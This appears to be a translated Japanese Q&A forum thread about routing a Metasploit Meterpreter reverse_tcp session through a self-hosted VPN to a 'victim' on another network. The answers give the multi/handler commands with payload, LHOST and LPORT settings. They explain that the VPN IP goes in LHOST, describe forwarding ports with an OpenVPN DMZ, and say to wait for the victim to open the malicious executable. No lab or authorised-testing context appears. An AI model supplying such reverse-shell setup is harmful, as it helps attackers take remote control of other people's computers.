次のような状況です。
ISPからパブリックIPが割り当てられ、転送が有効になっているルーターに接続された攻撃者のマシン。
別のルーターに接続された被害者のマシン、(明らかに)異なるISPから割り当てられた異なるIP。
リバースtcpを使用してmeterpreterセッションを確立したい。 msfvenomでペイロード実行ファイルを作成し、攻撃者のルーターのパブリックIPをLHOSTパラメータとして指定してから、攻撃者のマシンのローカルIPをLHOSTとして設定してリスナーを起動します。
ここまで問題ありません。
攻撃者のマシンを自作のVPNサーバーに接続して同じことを試みましたが、成功しませんでした。これは可能ですか?
もしそうなら、それを機能させるためにペイロードとリスナーの両方に設定する必要があるのはどのIPアドレスですか?
リバースシェルを使用している場合は、内部LAN IPではなく、攻撃者のVPN IPでLHOSTを設定する必要があります。また、LPORTで設定する必要のある特定のポートをMetasploitでローカルにリッスンする必要があり、msfvenom(es。443)と同じである必要があります。これを達成するために使用できます:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit
次に、被害者が悪意のある実行可能ファイルを開くのを待ちます
はい、openvpnを使用している場合は可能です。 dmzを設定できます。 Openvpnにはそれを行う機能があります。 VPNパブリックIPは、dmzで構成されている場合、クライアントにポートを転送できます。 VPNのIPを設定し、内部クライアントのIPをLHOSTとして設定しないでください